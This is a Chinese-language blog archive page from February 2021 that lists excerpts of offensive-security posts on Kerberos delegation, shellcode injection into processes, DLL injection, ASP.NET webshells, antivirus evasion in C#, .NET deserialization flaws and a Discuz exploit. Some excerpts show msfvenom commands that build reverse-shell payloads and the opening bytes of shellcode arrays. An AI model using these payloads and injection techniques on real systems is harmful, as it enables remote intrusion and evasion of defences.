02 2021 档案

Kerberos身份验证过程
摘要:Kerberos是一种身份验证协议,用于单点登录(SSO)。SSO的概念是只进行一次身份验证,并使用令牌访问您有权使用的任何服务。 Kerberos身份验证过程如下: 第一步 计算机将密码转换为NTLM哈希,然后使用哈希对该时间戳进行加密,然后将其作为身份验证票证(TGT)请求中的身份验证器发送给K 阅读全文
posted @ 2021-02-23 22:32 yourse1f 阅读(620) 评论(1) 推荐(0)
Kerberos委派
摘要:什么叫Kerberos委派? 在域中如果出现A使用Kerberos身份验证访问域中的服务B,而B再利用A的身份去请求域中的服务C,这个过程就可以理解为委派。 比如 User访问主机s2上的HTTP服务,而HTTP服务需要请求其他主机的SQLServer数据库,但是S2并不知道User是否有权限访问S 阅读全文
posted @ 2021-02-23 20:52 yourse1f 阅读(408) 评论(0) 推荐(0)
php代码审计指南-文件上传篇
摘要:恢复内容开始 前言 回顾拓展 0X01首先我们来看一个文件上传的简单页面 <?php {if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"]; if(!file_exists($_FILES 阅读全文
posted @ 2021-02-04 13:54 yourse1f 阅读(429) 评论(0) 推荐(0)
将shellcode注入本地进程
摘要:这次我们来学习一下将shellcode注入本地进程内存并切执行的经典方法 首先生成我们的shellcode msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d roo 阅读全文
posted @ 2021-02-04 13:53 yourse1f 阅读(720) 评论(0) 推荐(0)
使用windowsAPI 加载shellcode
摘要:msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f c -b \x00\x0a\x0d 这是一个简单的注入本地进程的代码 #include "stdafx.h"#include <Windows.h>i 阅读全文
posted @ 2021-02-04 13:51 yourse1f
DLL注入
摘要:dll其实就是c++的class 因为cpp只能有一个主函数 所以dll随之而来 这里的源码 #ifdef CREATEDELL_API_DU #else #define CREATEDELL_API_DU _declspec(dllimport) //当编译时,头文件不参加编译,所以.cpp文件中 阅读全文
posted @ 2021-02-04 13:48 yourse1f
shellcode注入原理
摘要:unsigned char buf[] = "\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff" "\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58" "\ 阅读全文
posted @ 2021-02-04 13:47 yourse1f 阅读(405) 评论(0) 推荐(0)
asp.net学习之路--c#asp.net小马
摘要:先写一个小马 using System;using System.Web;using System.IO;using System.Diagnostics;using System.Net;namespace Recmdy{ public partial class Recmd { public R 阅读全文
posted @ 2021-02-04 13:44 yourse1f
asp.net学习--asmx一句话木马
摘要:Web Service是一个基于可编程的web的应用程序,用于开发分布式的互操作的应用程序,也是一种web服务,Web Service的主要目标是跨平台的可互操作性,为了实现这一目标Web Service 完全基于XML(可扩展标记语言)、XSD(XML Schema)等独立于平台、独立于软件供应商 阅读全文
posted @ 2021-02-04 13:43 yourse1f
asp.net学习--svc一句话木马
摘要:tip--01了解什么叫WCF WCF (WindowsCommunication Foundation) 是微软为构建面向服务的应用程序所提供的统一编程模型,能够解决不同应用程序域,不同平台之间的通信问题。WCF统一了多重分布式技术:Webservice、.NetRemoting、.Net企业服务 阅读全文
posted @ 2021-02-04 13:41 yourse1f
php--莫客服系统代码审计(已申请CNVD)
摘要:1绕过登录进入后台 可以看见这里先验证是否存在service_token如果存在则进入admin/index/index方法 我们跟进查看 index是继承base的根据经验一般来说这些东西都是验证之类的 跟进果不其然 可以看见他这里uid的获取方法很奇怪是根据一个加密函数来获取的 我们看看这个方法 阅读全文
posted @ 2021-02-04 13:40 yourse1f
csharp免杀实战-1
摘要:using System; using System.IO; using System.Runtime.InteropServices; using System.Text.RegularExpressions; using System.Security.Cryptography; using S 阅读全文
posted @ 2021-02-04 13:37 yourse1f 阅读(281) 评论(0) 推荐(0)
.net学习--Json.net
摘要:在Newtonsoft.Json中使用JSONSerializer可以非常方便的实现.NET对象与Json之间的转化,JSONSerializer把.NET对象的属性名转化为Json数据中的Key,把对象的属性值转化为Json数据中的Value 我们还是先来了解json和net对象之间的转换Newt 阅读全文
posted @ 2021-02-04 13:34 yourse1f
通过CreateThreadpoolWait执行Shellcode
摘要:#include <windows.h> #include <threadpoolapiset.h> unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x5 阅读全文
posted @ 2021-02-04 13:33 yourse1f
.net学习--Fastjson反序列漏洞
摘要:download https://www.nuget.org/packages/fastJSON/2.3.1 首先还是看看fastjson的序列化和反序列化 <%@ Page Language="C#" AutoEventWireup="true" %> <%@ Import Namespace=" 阅读全文
posted @ 2021-02-04 13:32 yourse1f
.net JavaScriptSerializer反序列化漏洞
摘要:net中的javascriptserializer 在.NET处理 Ajax应用的时候,通常序列化功能由JavaScriptSerializer类提供,它是.NET2.0之后内部实现的序列化功能的类,位于命名空间System.Web.Script.Serialization、通过System.Web 阅读全文
posted @ 2021-02-04 13:30 yourse1f
windows discuz exploit
摘要:前提如果目标存在数据库备份 则可以通过windows短文件名得到备份sql文件 cmd dir /x可以看见短文件名 利用爆破下载 这里笔者写了一个检验脚本 use python3 time.py 2020-12-1 2020-12-21 http://192.168.1.104 1 import 阅读全文
posted @ 2021-02-04 13:29 yourse1f
java web安全(自定义Classloader)--服务器端动态解析二进制class文件
摘要:参考 https://xz.aliyun.com/t/2744#reply-16082 首先要让服务端有动态地将字节流解析成Class的能力,这是基础。 正常情况下,Java并没有提供直接解析class字节数组的接口。不过classloader内部实现了一个protected的defineClass 阅读全文
posted @ 2021-02-04 13:27 yourse1f